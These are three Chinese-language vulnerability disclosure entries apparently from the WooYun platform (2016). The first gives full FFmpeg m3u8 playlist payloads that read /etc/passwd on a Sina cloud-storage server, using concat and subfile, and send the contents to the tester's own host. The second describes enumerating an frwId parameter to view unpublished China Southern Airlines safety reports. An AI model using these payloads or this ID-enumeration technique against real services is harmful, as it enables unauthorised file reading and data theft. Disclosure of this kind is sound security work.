漏洞详情披露状态： 2016-05-07： 细节已通知厂商并且等待厂商处理中2016-05-10： 厂商已经确认，细节仅向厂商公开2016-05-20： 细节向核心白帽子及相关领域专家公开2016-05-30： 细节向普通白帽子公开2016-06-09： 细节向实习白帽子公开2016-06-24： 细节向公众公开简要描述：新浪某站任意文件读取详细说明：新浪微盘存在Ffmpeg文件读取漏洞，参考链接：http://zone.wooyun.org/content/27086，https://www.ffmpeg.org/ffmpeg-protocols.html#subfile1. 创建vdisk.avi，文件内容如下：code 区域#EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:10.0, concat:http://test.com/header.m3u8|file:///etc/passwd #EXT-X-ENDLIST2. 创建header.m3u8，文件内容如下：code 区域#EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:, http://test1.com/?3. 将header.m3u8上传至自己的服务器上，将vdisk.avi上传至新浪微盘4. 然后在http://test1.com/的web日志中可查看读取的文件内容，在这里我使用了hawkeye平台的Web访问日志查询功能可方便查看结果：使用file:///etc/passwd只能查看到第一行内容，好像是遇到换行符时，换行符之后的文件内容不再返回（实践证明确实如此），但是可以使用subfile分段读取文件，因此修改之后的vdisk.avi内容如下：code 区域#EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:10.0, concat:http://test.com/header.m3u8|subfile,,start,30,end,120,,:///etc/passwd #EXT-X-ENDLIST通过修改start和end值即可读取到文件的全部内容，测试得到的部分文件内容如下：只要肯花时间，读取任意文件不是问题！漏洞证明： 修复方案：升级Ffmpeg并且建议服务器禁止访问互联网版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：中漏洞Rank：8确认时间：2016-05-10 18:33厂商回复：感谢关注新浪安全，问题修复中。最新状态：暂无

漏洞详情披露状态： 2016-05-06： 细节已通知厂商并且等待厂商处理中2016-05-06： 厂商已经确认，细节仅向厂商公开2016-05-16： 细节向核心白帽子及相关领域专家公开2016-05-26： 细节向普通白帽子公开2016-06-05： 细节向实习白帽子公开2016-06-20： 细节向公众公开简要描述：南方航空某安全系统可越权访问全部安全事件报告详细说明：http://esms.cs-air.com/main/UserManager-esmsLogin.action南方航空安全管理系统通过在报告奖励发放处修改fwid值可越权查看尚未公布的无权查看的报告，包括最新的尚未处置的报告，由于报告中包含航空安全风险信息有可能对航空安全造成影响。通过遍历fwid值可获取全部报告。漏洞证明：http://esms.cs-air.com/main/UserManager-esmsLogin.action点击航空安全自愿报告进入如下界面，在未登录情况下原本只能访问界面中显示的几条信息，如果点击more会要求登录在已发布自愿报告中修改fwid会显示权限不足但是在年度奖励报告中修改fwid则会显示出报告内容如将有权查看的http://esms.cs-air.com/voluntary/FreewillReportEntity-reawardWithOutDetail.action?frwId=57178改成无权查看的http://esms.cs-air.com/voluntary/FreewillReportEntity-reawardWithOutDetail.action?frwId=74090可以查看新近的报告通过遍历获取了全部报告的ID 修复方案： 版权声明：转载请注明来源 黑骑士@乌云漏洞回应厂商回应：危害等级：低漏洞Rank：5确认时间：2016-05-06 16:37厂商回复：感谢提醒。最新状态：暂无

漏洞详情披露状态： 2016-06-17： 细节已通知厂商并且等待厂商处理中2016-06-22： 厂商主动忽略漏洞，细节向第三方安全合作伙伴开放（绿盟科技、唐朝安全巡航、无声信息）简要描述：我以为我的温柔，能给你整个宇宙。漏洞hash：b738c92c12c83fad41215e846716cd42版权声明：转载请注明来源 zhchbin@乌云漏洞回应厂商回应：危害等级：无影响厂商忽略忽略时间：2016-06-22 16:50厂商回复： 漏洞Rank：15 (WooYun评价)最新状态：暂无